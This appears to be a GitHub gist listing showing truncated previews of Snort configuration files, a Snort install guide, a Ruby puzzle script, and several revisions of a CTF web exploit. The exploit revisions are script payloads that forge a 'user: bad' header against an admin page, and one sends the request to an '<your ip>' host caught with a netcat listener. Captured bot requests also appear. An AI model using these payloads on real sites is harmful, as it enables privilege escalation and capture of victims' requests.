dmahhaha DavidMah
DavidMah
/ gist:4712062
Created
February 5, 2013 04:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # /etc/sysconfig/snort | |
| # $Id: snort.sysconfig,v 1.8 2003/09/19 05:18:12 dwittenb Exp $ | |
| #### General Configuration | |
| INTERFACE=p2p1 | |
| CONF=/etc/snort/snort.conf | |
| USER=snort | |
| GROUP=snort | |
| PASS_FIRST=0 | |
| #### Logging & Alerting | |
| LOGDIR=/var/log/snort |
DavidMah
/ gist:4712036
Created
February 5, 2013 03:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # $Id$ | |
| # | |
| # snortd Start/Stop the snort IDS daemon. | |
| # | |
| # chkconfig: 2345 40 60 | |
| # description: snort is a lightweight network intrusion detection tool that | |
| # currently detects more than 1100 host and network | |
| # vulnerabilities, portscans, backdoors, and more. | |
| # |
DavidMah
/ gist:4712028
Created
February 5, 2013 03:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Getting SNORT working in Fedora Core 17, VirtualBox 4.2.x/4.1.x, and DD-WRT v2.4 | |
| Last revised on December 3, 2012 | |
| This document describes compiling and installing SNORT 2.9.4 and DAQ 2.0.0 using the | |
| Hardware and Operating System(s) listed below: | |
| Microsoft Windows XP Professional Edition w/SP3 as the HOST operating system | |
| VirtualBox 4.2.x/4.1.x with Oracle Extension Pack 4.2.x/4.1.x (I use version 4.2.4) | |
| Fedora Core 17 (64-bit version) as the GUEST operating system (which runs SNORT) | |
| Buffalo WHR-G54S wireless router with DD-WRT v2.4 SP2 firmware (Build 14929) | |
| SNORT 2.9.4, DAQ 2.0.0, and a set of snort rules (www.snort.org) | |
| The hardware in the HOST system listed above is a Turion TL-58 processor (AMD) @ |
DavidMah
/ program.rb
Created
February 2, 2013 19:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'set' | |
| def letter_possibly_match(letter_one, letter_two) | |
| return true if letter_one == "?" or letter_two == "?" | |
| return true if letter_one == letter_two | |
| false | |
| end | |
| # TODO: memoization | |
| def possibly_match(segment_one, segment_two) | |
| (0...segment_one.size).each do |index| |
DavidMah
/ exploit.html
Created
February 2, 2013 01:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- CSRF through the mail function?--> | |
| <!-- sudo nc -lk 80--> | |
| <script> | |
| var oReq = new window.XMLHttpRequest; | |
| oReq.open("GET", "set_admin.php", true); | |
| oReq.setRequestHeader("user", "bad"); | |
| oReq.setRequestHeader("herp", "herp"); | |
| function handler(data) { | |
| if (oReq.responseText) { | |
| console.log(oReq.responseText); |
DavidMah
/ exploit.html
Created
February 2, 2013 01:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- CSRF through the mail function?--> | |
| <!-- sudo nc -lk 80--> | |
| <script> | |
| var oReq = new window.XMLHttpRequest; | |
| oReq.open("GET", "set_admin.php", true); | |
| oReq.setRequestHeader("user", "bad"); | |
| oReq.setRequestHeader("Set", "Set"); | |
| function handler(data) { | |
| output = (oReq.responseText) | |
| console.log(output) |
DavidMah
/ exploit.html
Created
February 2, 2013 01:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- CSRF through the mail function?--> | |
| <!-- sudo nc -lk 80--> | |
| <script> | |
| var oReq = new window.XMLHttpRequest; | |
| oReq.open("GET", "set_admin.php", true); | |
| oReq.setRequestHeader("user", "bad"); | |
| oReq.setRequestHeader("Set", "Set"); | |
| function handler(data) { | |
| console.log($(oReq.responseText)) | |
| } |
DavidMah
/ exploit.html
Created
February 2, 2013 00:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- CSRF through the mail function?--> | |
| <!-- sudo nc -lk 80--> | |
| <script> | |
| var oReq = new window.XMLHttpRequest; | |
| oReq.open("GET", "http://<your ip>", true); | |
| oReq.setRequestHeader("user", "bad"); | |
| oReq.send(); | |
| </script> |
DavidMah
/ gist:4695225
Created
February 2, 2013 00:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| OPTIONS / HTTP/1.1 | |
| Access-Control-Request-Method: GET | |
| Origin: http://ctf.nullcon.net | |
| User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.5.0 Safari/534.34 | |
| Referer: http://ctf.nullcon.net/challenges/web/web4/admin_mails.php | |
| Access-Control-Request-Headers: user | |
| Accept: */* | |
| Connection: Keep-Alive | |
| Accept-Encoding: gzip | |
| Accept-Language: en-IN,* |
DavidMah
/ gist:4695222
Created
February 2, 2013 00:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| OPTIONS / HTTP/1.1 | |
| Host: 69.91.131.148 | |
| Connection: keep-alive | |
| Access-Control-Request-Method: GET | |
| Origin: http://ctf.nullcon.net | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 | |
| Access-Control-Request-Headers: origin, 5 | |
| Accept: */* | |
| Referer: http://ctf.nullcon.net/challenges/web/web4/send_mail.php | |
| Accept-Encoding: gzip,deflate,sdch |